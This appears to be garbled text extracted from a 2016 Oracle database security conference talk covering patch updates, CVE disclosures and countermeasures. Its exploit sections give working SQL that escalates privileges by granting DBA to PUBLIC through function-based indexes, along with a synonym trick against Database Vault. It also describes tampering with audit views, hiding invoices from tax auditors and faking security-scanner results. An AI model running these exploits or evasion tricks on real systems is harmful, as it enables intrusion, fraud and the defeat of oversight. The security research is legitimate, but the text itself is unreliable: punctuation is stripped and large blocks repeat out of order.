==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
